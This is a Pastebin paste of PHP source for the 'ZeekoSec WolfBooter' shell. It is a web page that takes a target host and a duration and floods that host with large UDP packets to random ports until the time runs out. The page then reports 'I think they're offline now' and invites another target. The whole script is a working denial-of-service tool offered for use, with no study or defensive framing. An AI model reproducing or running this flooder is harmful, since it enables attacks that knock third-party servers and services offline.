Advertisement
ZeekoSec

[Shell-Source-Code]- Made for the "WolfBooter"

Jan 6th, 2015
477
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.01 KB | None | 0 0
  1. <html>
  2. <body>
  3. <center>
  4. <font color="ff307c">
  5. <pre>
  6. <FONT COLOR="65ff57"><h1>ZeekoSec - WolfBooter</h1></FONT>
  7. </pre>
  8. <STYLE>
  9. input{
  10. background-color: #ff307c; font-size: 8pt; color: #ffb545; font-family: Tahoma; border: 1 solid #66;
  11. }
  12. button{
  13. background-color: #98AFC7; font-size: 8pt; color: ##ffb545; font-family: "Lucida Console; border: 1 solid #66;
  14. }
  15. body {
  16. background: url(http://freetopwallpaper.com/wp-content/gallery/cloud/cloud-wallpaper-hd-background-47.jpg);
  17. }
  18. </style>
  19. <?php
  20. //UDP
  21. if(isset($_GET['host'])&&isset($_GET['time'])){
  22.     $packets = 0;
  23.     ignore_user_abort(TRUE);
  24.     set_time_limit(0);
  25.  
  26.     $exec_time = $_GET['time'];
  27.  
  28.     $time = time();
  29.     //print "Started: ".time('d-m-y h:i:s')."<br>";
  30.     $max_time = $time+$exec_time;
  31.  
  32.     $host = $_GET['host'];
  33.  
  34.     for($i=0;$i<65000;$i++){
  35.             $out .= 'X';
  36.     }
  37.     while(1){
  38.     $packets++;
  39.             if(time() > $max_time){
  40.         break;
  41.             }
  42.             $rand = rand(1,65000);
  43.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  44.             if($fp){
  45.         fwrite($fp, $out);
  46.         fclose($fp);
  47.             }
  48.     }
  49.     echo "<br><b>I think they're offline now...</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  50.     echo '<br><br>
  51.        <form action="'.$surl.'" method=GET>
  52.        <input type="hidden" name="act" value="engine">
  53.        Try another? Host: <br><input type=text name=host><br>
  54.        It only takes a few seconds! Time: <br><input type=text name=time><br>
  55.        <input type=submit value=Go></form>';
  56. }else{ echo '<br><b>Start all engines!</b><br><br>
  57.            <form action=? method=GET>
  58.            <input type="hidden" name="act" value="engine">
  59.            Host: <br><input type=text name=host value=><br>
  60.            Time: <br><input type=text name=time value=><br>
  61.            <input type=submit value=Go></form>';
  62. }
  63. ?>
  64. </center>
  65. </body>
  66. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement